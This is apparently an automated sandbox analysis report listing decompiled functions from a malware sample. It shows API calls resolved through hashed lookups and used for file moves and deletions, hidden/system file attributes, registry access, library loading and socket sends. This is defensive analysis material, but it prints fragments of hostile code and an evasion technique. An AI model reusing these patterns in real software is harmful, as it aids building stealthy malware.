                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: CheckMembershipToken
                        • String ID:
                        • API String ID: 1351025785-0
                        • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                        • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                        • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                        • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                        				void* _t3;
                        				int _t5;
                        
                        				_t3 = E00403D4D(__eflags, _a4); // executed
                        				if(_t3 == 0) {
                        					__eflags = 0;
                        					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                        					_t5 = CreateDirectoryW(_a4, 0); // executed
                        					return _t5;
                        				} else {
                        					return 1;
                        				}
                        			}





                        0x00403c68
                        0x00403c70
                        0x00403c78
                        0x00403c82
                        0x00403c8b
                        0x00403c8f
                        0x00403c72
                        0x00403c76
                        0x00403c76

                        APIs
                        • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: CreateDirectory
                        • String ID:
                        • API String ID: 4241100979-0
                        • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                        • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                        • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                        • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E0040642C(void* __eflags) {
                        				short _v40;
                        				intOrPtr* _t6;
                        				void* _t10;
                        
                        				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                        				 *_t6( &_v40); // executed
                        				return 0 | _v40 == 0x00000009;
                        			}






                        0x0040643c
                        0x00406445
                        0x00406454

                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                        • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                        • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                        • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 37%
                        			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                        				intOrPtr _t5;
                        
                        				_t5 = _a12;
                        				if(_t5 == 0) {
                        					_t5 = E00405D0B(_a8) + 1;
                        				}
                        				__imp__#19(_a4, _a8, _t5, 0); // executed
                        				return _t5;
                        			}




                        0x00404eed
                        0x00404ef2
                        0x00404efd
                        0x00404efd
                        0x00404f07
                        0x00404f0e

                        APIs
                        • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: send
                        • String ID:
                        • API String ID: 2809346765-0
                        • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                        • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                        • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                        • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                        				int _t6;
                        				void* _t7;
                        
                        				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                        				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                        				return _t6;
                        			}





                        0x00403bdd
                        0x00403beb
                        0x00403bee

                        APIs
                        • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileMove
                        • String ID:
                        • API String ID: 3562171763-0
                        • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                        • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                        • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                        • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Startup
                        • String ID:
                        • API String ID: 724789610-0
                        • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                        • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                        • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                        • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040427D(WCHAR* _a4) {
                        				int _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                        				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                        				return _t4;
                        			}





                        0x0040428a
                        0x00404297
                        0x0040429a

                        APIs
                        • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                        • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                        • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                        • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00404A19(void* _a4, short* _a8, void** _a12) {
                        				long _t5;
                        				void* _t6;
                        
                        				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
                        				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
                        				return _t5;
                        			}





                        0x00404a27
                        0x00404a35
                        0x00404a38

                        APIs
                        • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Open
                        • String ID:
                        • API String ID: 71445658-0
                        • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                        • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                        • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                        • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403C40(void* _a4) {
                        				int _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
                        				_t4 = FindCloseChangeNotification(_a4); // executed
                        				return _t4;
                        			}





                        0x00403c4d
                        0x00403c55
                        0x00403c58

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                        • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                        • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                        • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403C08(WCHAR* _a4) {
                        				int _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
                        				_t4 = DeleteFileW(_a4); // executed
                        				return _t4;
                        			}





                        0x00403c15
                        0x00403c1d
                        0x00403c20

                        APIs
                        • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteFile
                        • String ID:
                        • API String ID: 4033686569-0
                        • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                        • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                        • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                        • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00402C1F(WCHAR* _a4) {
                        				struct HINSTANCE__* _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
                        				_t4 = LoadLibraryW(_a4); // executed
                        				return _t4;
                        			}





                        0x00402c2c
                        0x00402c34
                        0x00402c37

                        APIs
                        • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                        • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                        • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                        • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403BEF(void* _a4) {
                        				int _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
                        				_t4 = FindClose(_a4); // executed
                        				return _t4;
                        			}





                        0x00403bfc
                        0x00403c04
                        0x00403c07

                        APIs
                        • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseFind
                        • String ID:
                        • API String ID: 1863332320-0
                        • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                        • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                        • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                        • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403BB7(WCHAR* _a4) {
                        				long _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 0, 0xc6808176, 0, 0);
                        				_t4 = GetFileAttributesW(_a4); // executed
                        				return _t4;
                        			}





                        0x00403bc4
                        0x00403bcc
                        0x00403bcf

                        APIs
                        • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                        • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                        • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                        • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004049FF(void* _a4) {
                        				long _t3;
                        				void* _t4;
                        
                        				E004031E5(_t4, 9, 0xd980e875, 0, 0);
                        				_t3 = RegCloseKey(_a4); // executed
                        				return _t3;
                        			}





                        0x00404a0d
                        0x00404a15
                        0x00404a18

                        APIs
                        • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                        • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                        • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                        • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403B64(WCHAR* _a4) {
                        				int _t3;
                        				void* _t4;
                        
                        				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
                        				_t3 = PathFileExistsW(_a4); // executed
                        				return _t3;
                        			}





                        0x00403b72
                        0x00403b7a
                        0x00403b7d

                        APIs
                        • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID:
                        • API String ID: 1174141254-0
                        • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                        • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                        • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                        • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • closesocket.WS2_32(00404EB0), ref: 00404DEB
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: closesocket
                        • String ID:
                        • API String ID: 2781271927-0
                        • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                        • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                        • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                        • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403F9E(void* _a4) {
                        				int _t3;
                        				void* _t4;
                        
                        				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
                        				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
                        				return _t3;
                        			}





                        0x00403fac
                        0x00403fba
                        0x00403fbe

                        APIs
                        • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                        • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                        • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                        • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00406472(long _a4) {
                        				void* _t3;
                        				void* _t4;
                        
                        				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
                        				Sleep(_a4); // executed
                        				return _t3;
                        			}





                        0x0040647f
                        0x00406487
                        0x0040648a

                        APIs
                        • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368675103.00000000004A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_wi7zJOZT2r.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                        • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                        • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                        • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E004058EA(char* _a4, char* _a8) {
                        				char* _t4;
                        				void* _t5;
                        
                        				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
                        				_t4 = StrStrA(_a4, _a8); // executed
                        				return _t4;
                        			}





                        0x004058f8
                        0x00405903
                        0x00405906

                        APIs
                        • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                        Memory Dump Source
                        • Source File: 00000000.00000002.368660717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.368657499.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                        • Associated: 00000000.00000002.368670807.0000000000415000.00000002.00000001.01000000.00000004.sdmpDownload File
